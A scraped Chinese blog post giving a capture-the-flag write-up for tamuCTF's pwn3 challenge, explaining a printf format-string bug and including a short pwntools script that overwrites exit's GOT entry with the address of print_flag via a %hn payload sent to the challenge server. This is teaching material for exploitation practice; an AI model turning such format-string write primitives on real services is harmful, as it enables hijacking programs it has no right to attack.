格式化字符漏洞 tamuCTF pwn3 writeup
来源:互联网 发布:落叶知多少是哪首诗 编辑:程序博客网 时间:2024/06/05 11:07
之前一直不怎么会格式化字符串的漏洞,刚好碰上这道题,学习一波
首先看下main函数,读一个字符串,然后打印出来,之后直接exit(0) 无法利用栈溢出跳转,但是prinf是直接打印读取的东西,这里就存在一个格式化字符串漏洞。
这里推荐一个格式化字符串漏洞入门的教程:
http://codearcana.com/posts/2013/05/02/introduction-to-format-string-exploits.html
建议看完这个教程之后再来看我的wp
首先看一下字符串在第几个参数,这里可以看出是第4个参数,其实也可以用gdb看内存看出来,只不过麻烦一点。
看了下,它自带了print_flag()函数,那么思路就很明显,只要利用格式化字符串漏洞覆写got表,将exit的地址改成print_flag()的地址就行
下面就是脚本
from pwn import *#p = process('./pwn3')p=remote('pwn.ctf.tamu.edu',4323)exit_got=0x0804A01C #这里是要exit的got表所在地址payload=p32(exit_got)+'%'+str(34219-4)+'x%4$hn' #首先写上要覆写的地址,然后% str(34219)x就是要向所在地址写入的值,%4$hn,就是代表向第四个参数所在的地址写入前面的值p.sendline(payload)flag=p.recvall()print flag
阅读全文
0 0
- 格式化字符漏洞 tamuCTF pwn3 writeup
- 浅析格式化串漏洞
- 浅析格式化串漏洞
- 格式化字符串漏洞
- 格式化字符串漏洞实验
- 浅析格式化串漏洞
- 格式化字符串漏洞简介
- 实践格式化字符串漏洞
- 格式化字符串漏洞攻击
- 字符格式化
- 字符格式化
- 字符格式化
- 字符格式化
- 字符格式化
- C# 格式化字符字符
- 格式化字符串漏洞利用 二、格式化函数
- 格式化字符串漏洞利用 三、格式化字符串漏洞
- 【原理】浅析格式化串漏洞
- CSS 选择器 (1、2、3 )
- hash算法原理详解
- mysql 查询当天、本周,本月,上一个月的数据
- 击败Facebook Infer!360火线大起底
- windows下Libvirt Java环境部署
- 格式化字符漏洞 tamuCTF pwn3 writeup
- CodeForces
- 分页系统的地址变换机构
- WebSocket开发过程中遇到的几个小问题
- Pinterest推荐系统四年进化之路
- 前端js实现粘贴图片到可编辑的div(其他标签也可)中
- Python笔记003——PyQt5安装
- 文章标题
- iOS-URLEncode和URLDecode